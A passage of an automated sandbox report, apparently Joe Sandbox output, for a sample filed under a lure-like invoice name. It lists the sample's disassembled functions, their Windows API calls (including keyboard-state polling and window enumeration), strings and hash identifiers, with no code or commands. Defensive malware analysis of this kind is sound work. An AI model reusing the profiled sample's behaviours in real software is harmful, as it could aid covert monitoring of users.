                                                              • Opcode Fuzzy Hash: e960b6585698c2e1955038bd3dc69ab803a76bc3a320e2323390f3ba7c486acb
                                                              • Instruction Fuzzy Hash: 391182E166026D7ADB20F765CC4ADFFFABCEBE3B14F0005197512A60D1DF601A55C5A0
                                                              Function 0023778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • timeGetTime.WINMM ref: 00237794
                                                                • Part of subcall function 0020DC38: timeGetTime.WINMM(?,7694B400,002658AB), ref: 0020DC3C
                                                              • Sleep.KERNEL32(0000000A), ref: 002377C0
                                                              • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 002377E4
                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00237806
                                                              • SetActiveWindow.USER32 ref: 00237825
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00237833
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00237852
                                                              • Sleep.KERNEL32(000000FA), ref: 0023785D
                                                              • IsWindow.USER32 ref: 00237869
                                                              • EndDialog.USER32(00000000), ref: 0023787A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 2db18d07f937cb5679fd2ec92927ffdefb30e80966ed741a5e3f9c218a0f32ab
                                                              • Instruction ID: cff04960d488a9247102fcb3ccb854515bfd2a5a964c7ef91ee5ea37c02f4d29
                                                              • Opcode Fuzzy Hash: 2db18d07f937cb5679fd2ec92927ffdefb30e80966ed741a5e3f9c218a0f32ab
                                                              • Instruction Fuzzy Hash: D8216DF062420AAFEB209F20FC8DB267FB9FB45348F400164F50A921A2CB718C60DB64
                                                              Function 002402EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CoInitialize.OLE32(00000000), ref: 0024034B
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002403DE
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 002403F2
                                                              • CoCreateInstance.OLE32(0027DA8C,00000000,00000001,002A3CF8,?), ref: 0024043E
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002404AD
                                                              • CoTaskMemFree.OLE32(?,?), ref: 00240505
                                                              • _memset.LIBCMT ref: 00240542
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0024057E
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002405A1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 002405A8
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002405DF
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 002405E1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 6506c63c48de13bfc7192c7cd0adf453b2ed27bf5fb44b0519c9cd0739f4a569
                                                              • Instruction ID: dc2eeeabb79586afd3b3fd726e843cd9ca0d4d34d4a9d7ce3440e28f7378a939
                                                              • Opcode Fuzzy Hash: 6506c63c48de13bfc7192c7cd0adf453b2ed27bf5fb44b0519c9cd0739f4a569
                                                              • Instruction Fuzzy Hash: 4CB1C875A10209AFDB14DFA4D889DAEBBB9FF48304B148499F909EB251DB70ED81CF50
                                                              Function 00232E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00232ED6
                                                              • SetKeyboardState.USER32(?), ref: 00232F41
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00232F61
                                                              • GetKeyState.USER32(000000A0), ref: 00232F78
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00232FA7
                                                              • GetKeyState.USER32(000000A1), ref: 00232FB8
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00232FE4
                                                              • GetKeyState.USER32(00000011), ref: 00232FF2
                                                              • GetAsyncKeyState.USER32(00000012), ref: 0023301B
                                                              • GetKeyState.USER32(00000012), ref: 00233029
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00233052
                                                              • GetKeyState.USER32(0000005B), ref: 00233060
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 9f28d13da913cd2fbb87c0910dc8ab3d89839e270fe62efb3fcb467ce76c7663
                                                              • Instruction ID: 8e05e68fdf437691001aa572d8168a2bfc53dcac495e3c309eb592cb5e2ccf3e
                                                              • Opcode Fuzzy Hash: 9f28d13da913cd2fbb87c0910dc8ab3d89839e270fe62efb3fcb467ce76c7663
                                                              • Instruction Fuzzy Hash: 8E512AB0A187C569FB35EFB488017EABFF45F11340F08458EC5C25A1C2DA54AB9CCBA2
                                                              Function 0022ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0022ED1E
                                                              • GetWindowRect.USER32(00000000,?), ref: 0022ED30
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0022ED8E
                                                              • GetDlgItem.USER32(?,00000002), ref: 0022ED99
                                                              • GetWindowRect.USER32(00000000,?), ref: 0022EDAB
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0022EE01
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0022EE0F
                                                              • GetWindowRect.USER32(00000000,?), ref: 0022EE20
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0022EE63
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0022EE71
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0022EE8E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0022EE9B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: e1b817ab0a65cddbe40fc171e15b6d6255b9d180fb7e909156a7ef688a0050a8
                                                              • Instruction ID: e808caefead9b7016195313c703146d98be33211c10a2cfc11ee33d9e42840a1
                                                              • Opcode Fuzzy Hash: e1b817ab0a65cddbe40fc171e15b6d6255b9d180fb7e909156a7ef688a0050a8
                                                              • Instruction Fuzzy Hash: 5D510171B10205AFDF18DFA9ED89AAEBBB9FF88710F158129F519D6290D7709D408B10
                                                              Function 0020B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0020B759,?,00000000,?,?,?,?,0020B72B,00000000,?), ref: 0020BA58
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0020B72B), ref: 0020B7F6
                                                              • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0020B88D
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0026D8A6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0026D8D7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0026D8EE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0020B72B,00000000,?,?,0020B2EF,?,?), ref: 0026D90A
                                                              • DeleteObject.GDI32(00000000), ref: 0026D91C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: 92622a6a91694d5b4ca9a48c63b5e6f8bdc4678989cc4affd1a073ed1a9d71a6
                                                              • Instruction ID: 7e16960c1f498799ebc9a65c355e533cc8bdb20800b770aa8f68ffa04f99f260
                                                              • Opcode Fuzzy Hash: 92622a6a91694d5b4ca9a48c63b5e6f8bdc4678989cc4affd1a073ed1a9d71a6
                                                              • Instruction Fuzzy Hash: 87613731A21706DFDB3A9F14E999B25B7B9FF94316F244519E04686AB1C770A8F0CF80
                                                              Function 0020B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B526: GetWindowLongW.USER32(?,000000EB), ref: 0020B537
                                                              • GetSysColor.USER32(0000000F), ref: 0020B438
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: f98cdb5e9221afb9fc7c425aebd43ca845b06c6a245c09e1978aecbe6b1bdfed
                                                              • Instruction ID: f4d48870ea7ea083f3ef642b9d42a7ac71177b49fc9b8daa6eacccecfe2bfe61
                                                              • Opcode Fuzzy Hash: f98cdb5e9221afb9fc7c425aebd43ca845b06c6a245c09e1978aecbe6b1bdfed
                                                              • Instruction Fuzzy Hash: 8A41C030510244ABDF325F28EC99BB93B66AF06721F584261FD698E1E7D7318D91CB21
                                                              Function 0023690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                              • String ID:
                                                              • API String ID: 136442275-0
                                                              • Opcode ID: 1592ab4851d031c1308cb4caf8a7c133c763326a8a0046d58d285d35163940c7
                                                              • Instruction ID: bc7bd05245b087e5d191a758337ab19efd7c0fe6946fa9a5ff825af9e81f864a
                                                              • Opcode Fuzzy Hash: 1592ab4851d031c1308cb4caf8a7c133c763326a8a0046d58d285d35163940c7
                                                              • Instruction Fuzzy Hash: 2F412CB685511CAECF61EB90DC85DCAB3BCEB54300F1041A6B659A2051EE70ABF98F90
                                                              Function 0023D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(0028DC00,0028DC00,0028DC00), ref: 0023D7CE
                                                              • GetDriveTypeW.KERNEL32(?,002A3A70,00000061), ref: 0023D898
                                                              • _wcscpy.LIBCMT ref: 0023D8C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: fbf65288069cb90330257790dcaef8b5041d14b5b1ad3161b9f30a1274e04bb2
                                                              • Instruction ID: 8a04550f69b29957a7399d4c24ee3e6a48a520036b8aea5c21700329057783eb
                                                              • Opcode Fuzzy Hash: fbf65288069cb90330257790dcaef8b5041d14b5b1ad3161b9f30a1274e04bb2
                                                              • Instruction Fuzzy Hash: 6E51F5711243049FC700EF14E881A6EB7A5FF94714F10882EF999572A2DB71ED2ACB42
                                                              Function 001F936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __swprintf.LIBCMT ref: 001F93AB
                                                              • __itow.LIBCMT ref: 001F93DF
                                                                • Part of subcall function 00211557: _xtow@16.LIBCMT ref: 00211578
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf_xtow@16
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 1502193981-2263619337
                                                              • Opcode ID: 566133b592f7009fcfa759cc6eedb16f6b6726ee784d1ff6dd2a56b5fa1d6515
                                                              • Instruction ID: 07ae3f1dd9b0fea45efdfcdd4b287aabd11490926b52d900dea9505f45ba5642
                                                              • Opcode Fuzzy Hash: 566133b592f7009fcfa759cc6eedb16f6b6726ee784d1ff6dd2a56b5fa1d6515
                                                              • Instruction Fuzzy Hash: 8041D771520209AFDB24FF74D941FBA77E4FB44300F24446AE689D72C2EB7199A1CB50
                                                              Function 0025A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0025A259
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0025A260
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0025A273
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0025A27B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0025A286
                                                              • DeleteDC.GDI32(00000000), ref: 0025A28F
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0025A299
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0025A2AD
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0025A2B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 1e6c691ebf0f9008e5988522c73891caa3e4233ccd8ac45926d3efc621792510
                                                              • Instruction ID: 97415870cce532cb95f7ba09e6954e7ac93251ad08eb8087e1e53bd78c27b574
                                                              • Opcode Fuzzy Hash: 1e6c691ebf0f9008e5988522c73891caa3e4233ccd8ac45926d3efc621792510
                                                              • Instruction Fuzzy Hash: C1318C31111215ABDF115FA4EC4AFEA3B79FF0A361F110314FE19A60A0CB36D865DBA8
                                                              Function 00236F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 2620052-3771769585
                                                              • Opcode ID: e2b75178d7f9c5658858286a361824ed3a90449d77f8be1419cf4f3e4e518953
                                                              • Instruction ID: b5b797cd4af282f783de752481849a34c3372404a497c1c5a820c699853f05d6
                                                              • Opcode Fuzzy Hash: e2b75178d7f9c5658858286a361824ed3a90449d77f8be1419cf4f3e4e518953
                                                              • Instruction Fuzzy Hash: 7411B4B2524215BBDB24AB70AC4EEEA77BCEF45710F004165F14AA6091EFB0DAE58B50
                                                              Function 0021500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00215047
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • __gmtime64_s.LIBCMT ref: 002150E0
                                                              • __gmtime64_s.LIBCMT ref: 00215116
                                                              • __gmtime64_s.LIBCMT ref: 00215133
                                                              • __allrem.LIBCMT ref: 00215189
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002151A5
                                                              • __allrem.LIBCMT ref: 002151BC
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002151DA
                                                              • __allrem.LIBCMT ref: 002151F1
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0021520F
                                                              • __invoke_watson.LIBCMT ref: 00215280
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction ID: 582a7774c92641aa7bfff09dfc88317faf5f16531abc49c89790eda0aba78aba
                                                              • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                              • Instruction Fuzzy Hash: 7871EA72A10B37FBD7149EA8CC41BDA73E8AFA8364F144169F914D6281E770D9E08BD0
                                                              Function 00234DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00234DF8
                                                              • GetMenuItemInfoW.USER32(002B1708,000000FF,00000000,00000030), ref: 00234E59
                                                              • SetMenuItemInfoW.USER32(002B1708,00000004,00000000,00000030), ref: 00234E8F
                                                              • Sleep.KERNEL32(000001F4), ref: 00234EA1
                                                              • GetMenuItemCount.USER32(?), ref: 00234EE5
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00234F01
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00234F2B
                                                              • GetMenuItemID.USER32(?,?), ref: 00234F70
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00234FB6
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00234FCA
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00234FEB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: 072c2db1fd93f7195d8a8dc8c87b75bed443631561af33034407e10a02c79c0f
                                                              • Instruction ID: 1a0f436a69f9eb07510db3e1b8b5e964fd3deeeb919858167caaf638f23ff95b
                                                              • Opcode Fuzzy Hash: 072c2db1fd93f7195d8a8dc8c87b75bed443631561af33034407e10a02c79c0f
                                                              • Instruction Fuzzy Hash: AD61B3F1920259AFDB20EF64D888DAE7BB8FF05308F180599F805A3251D770BD65CB20
                                                              Function 00259C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00259C98
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00259C9B
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00259CBF
                                                              • _memset.LIBCMT ref: 00259CD0
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00259CE2
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00259D5A
                                                              Memory Dump Source
